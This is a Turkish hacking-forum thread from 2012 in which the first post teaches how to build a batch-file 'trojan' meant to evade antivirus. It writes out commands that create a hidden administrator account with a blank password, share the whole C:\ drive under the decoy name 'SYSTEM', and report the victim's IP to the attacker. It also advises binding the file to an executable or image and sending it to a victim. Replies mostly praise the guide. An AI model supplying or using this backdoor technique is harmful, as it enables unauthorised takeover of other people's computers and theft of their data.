İPUCU

Trojan ve Virüsler Trojan ve Virüsler Hakkında Bilgiler.

Seçenekler

Trojen Hazırlama (Hiçbir Antivirüse Yakalanmıyor)

04-08-2012 19:37
#1
Üyelik tarihi:
08/2012
Mesajlar:
85
Teşekkür (Etti):
15
Teşekkür (Aldı):
3
Konular:
40
Ewet arkadaslar* konunun basligindan da anlayabileceginiz gibi Anti
Virus programlari tarafindan taninmayan tamamen size ait bir trojan
yapmayi size kisaca anlatacagim;

Trojanin ana amaci* adindan
da anlasilacagi gibi hedef sisteme sizarak ya ele gecirmek ya da bilgi
toplamaktir. Dikkat edin zarar vermek demiyorum cünkü bu etik olarak
yanlis bir harekettir

Piyasada bu konuda son derece
fonksiyonel bircok Trojan var fakat bu trojanlari kodlayanlarin hepsi
Ticari amac güttükleri icin ki bu konuda da sonuna kadar haklidirlar*
Trojanlarin Special Edition olan versiyonlarinin disindaki tüm Public
versiyonlari maalesef AV lerce taninmakta ve hepsinden önemlisi
Firewallar tarafindan bloke edilmektedirler ve bu da kullanicilarin
isini oldukca zorlastirmaktadir.

Size simdi anlatacagim
yöntem* biraz mantik biraz da teknik bilgi gerektirmektedir. Bu
ikisinin disinda baska hicbir toola ihtiyaciniz yoktur.

Simdi Trojanimizi hazirlamaya baslayalim;

1-) Öncelikle bir TXT dosyasi acin ve icine su komutu girin;

net user HACK /add

Bu
komut sayesinde kurbanin makinasinda "HACK" isminde bir user yarattik.
Fakat bu user hesabi normal olarak acildigi icin haklari da sınırlı
olacaktir. Bu nedenle ikinci asamaya geciyoruz;

2-) Simdi yukaridaki komutun hemen bir alt satirina gecin ve su komutu ekleyin;

net localgroup administrators HACK /add

Böylece "HACK" isimli kullanici hesabini* direk Administrator grubuna kattik. Artik "HACK" hesabimiz tüm yetkilere sahip.

3-)
Simdi de kurbanimizin makinasindaki C:\ sürücüsünü sınırsız paylasima
acacagiz. Kurbani da huylandirmamak icin paylasim adini SYSTEM olarak
set edecegiz. Bunun icin asagidaki komutu kullanacagiz;

net share system=C:\ /unlimited

Ewet
artik Kurbanimizin makinasini sonuna kadar actik. Peki kurbanin IP sini
nereden bilecegiz de kurbanin makinasina bu yarattigimiz "HACK"
hesabindan baglanacagiz?

Bunun icin de kodumuza bir satirlik bir komut daha ekleyecegiz;

4-)
NET SEND komutunu kullanarak kurbanin bize Windowsun Messaging Servisi
vasitasi ile mesaj atmasini ve IP sini bize söylemesini saglayacagiz.
Bunun icin asagidaki komutu da kodunuzun icerisine ekleyin;

net send 82.35.23.46(buraya kendi IP nizi girin) Ben senin kurbaninim Gel bana baglan

Unutmayin 82. li baslayan IP adresi yerine kendi IP nizi yazin.

4-)
Son olarak ufak bir önlem alacagiz. Peki nedir bu önlem? Bildiginiz
gibi Windows Messenger Servisini kullanan internette ortalikta gezinen
bircok ufak tefek Spylar oldugu icin Messenger servisi genelde Disabled
’dir. Disabled olursa NET SEND komutu bir ise yaramaz. Iste bu son
önlemimizde de bu servisi Disabled tan Automatic moduna set
ettirecegiz. Öncelikle Administrative Tools dan Services sekmesine
giriyoruz ve oradan Messenger servisinin kod icerisinde kullanacagimiz
adini ögreniyoruz. Adi Messenger ’mis. simdi bu adi kullanarak bu
servisi calistiriyoruz.

net start Messenger

Size
tavsiyem* bu son komutu kodunuzun en basina koymaniz. Böylelikle
ardisik sirada önce Messenger servisi calistirilacak daha sonra diger
islemler yapilacaktir. Kodun saglikli calismasi acisindan bu 4. şıkkı
ilk siraya koymaniz daha iyi olur.

Son olarak TXT de
yazdiginiz kodunuzu .bat olarak istediginiz bir isimde kaydedin ve
ister bir EXE ile join ettirin ister bir resim ile birlestirin
isterseniz kurbaniniza direk gönderin.

Kurbaniniz bu dosyayi
calistirdigi an makinasinda Admin haklarina sahip HACK adinda bir user
acilacak ve sifresi de blank yani bos olacaktir. C:\ sürücüsü de full
olarak paylasima acilmis olacak ve son olarak da IP si size gelecektir.


Artik IP sini de bildiginize göre* ister DOS komut satirina
düserek direk HACK kullanicisina baglanabilir istediginizi
yapabilirsiniz ister Essential Net Tools türünden bir program ile
paylasima actirdiginiz C:\ sürücüsüne sizar istediginizi yaparsiniz.

Isin
en güzel tarafi* yukaridaki BAT dosyasinin tamamen Microsoftun bize
sundugu DOS komutlari kullanilarak hazirlanmis olmasi nedeni ile hicbir
Anti Viruse yakalanmamasi ve "HACK" kullanicisina direk Admin olarak
baglandiginiz icin hicbir personal firewall tarafindan engellenmemesidir

BİR TEŞEKKUR YETER.
cypher58 Teşekkür etti.

04-08-2012 20:42
#2
bss - ait Kullanıcı Resmi (Avatar)
bss
Forumdan Uzaklaştırıldı
Üyelik tarihi:
07/2012
Nereden:
AFYON
Mesajlar:
517
Teşekkür (Etti):
8
Teşekkür (Aldı):
23
Konular:
49
alıntı yazmalısın
04-08-2012 20:48
#3
deliveren1 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2009
Mesajlar:
7
Teşekkür (Etti):
0
Teşekkür (Aldı):
0
Konular:
2
anlatım iyi teşekkürler.
04-08-2012 21:25
#4
hckteam22 - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
04/2012
Nereden:
edirne
Mesajlar:
815
Teşekkür (Etti):
43
Teşekkür (Aldı):
44
Konular:
51
Eline Sağlık Ama Alıntı Diye Bir Dipnot Düşmelisin..
04-08-2012 23:44
#5
FaaX - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2012
Nereden:
Tokat
Mesajlar:
57
Teşekkür (Etti):
1
Teşekkür (Aldı):
3
Konular:
8
Güzel anlatım
Kullanıcı İmzası
بِسْــــــــــــــــــــــمِ اﷲِارَّحْمَنِارَّحِيم
FaaX ®Copyright ©2012, TurkHackTeam
05-08-2012 02:48
#6
hklog - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2012
Mesajlar:
2
Teşekkür (Etti):
1
Teşekkür (Aldı):
0
Konular:
0
karşıdaki tıkladıgında ip nerde gözükcek ben yapamadım sağlıklı sonuç alan varmı arkdaşlar
08-08-2012 00:00
#7
oflazkemal - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2011
Nereden:
Konya
Mesajlar:
854
Teşekkür (Etti):
169
Teşekkür (Aldı):
76
Konular:
33
teşekkürler bir rat kullanmak daha kolay
Hacker By Hanzo Teşekkür etti.
08-08-2012 10:20
#8
Üyelik tarihi:
07/2012
Nereden:
İstanbul
Mesajlar:
2.513
Teşekkür (Etti):
164
Teşekkür (Aldı):
447
Konular:
185
Konu yukseltmek için acılıyor yalan demeyin bende ilk bşta bunu yapmıstım... ilk konum buydu ama sonra ogrendim bidahaa vermeye gerek yok biraz düşünceli olalım forumu kirletmeyelim
Kullanıcı İmzası
Silence , My Brother.
Hacker By Hanzo Teşekkür etti.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı